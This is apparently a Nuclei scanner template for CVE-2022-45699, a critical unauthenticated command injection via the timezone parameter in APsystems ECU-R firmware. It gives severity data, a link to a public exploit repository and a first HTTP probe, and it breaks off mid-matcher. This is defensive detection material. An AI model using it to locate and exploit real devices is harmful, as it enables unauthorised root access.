id: CVE-2022-45699 info: name: APsystems ECU-R Firmware - Command Injection author: pussycat0x severity: critical description: | Command injection in the administration interface in APSystems ECU-R version 5203 allows a remote unauthenticated attacker to execute arbitrary commands as root using the timezone parameter. reference: - https://github.com/0xst4n/APSystems-ECU-R-RCE-Timezone classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-45699 cwe-id: CWE-78,CWE-94 epss-score: 0.12693 epss-percentile: 0.9361 cpe: cpe:2.3:o:apsystems:ecu-r_firmware:5203:*:*:*:*:*:*:* metadata: vendor: apsystems product: ecu-r_firmware tags: cve,cve2022,rce,apsystems,kev flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: word part: body words: - "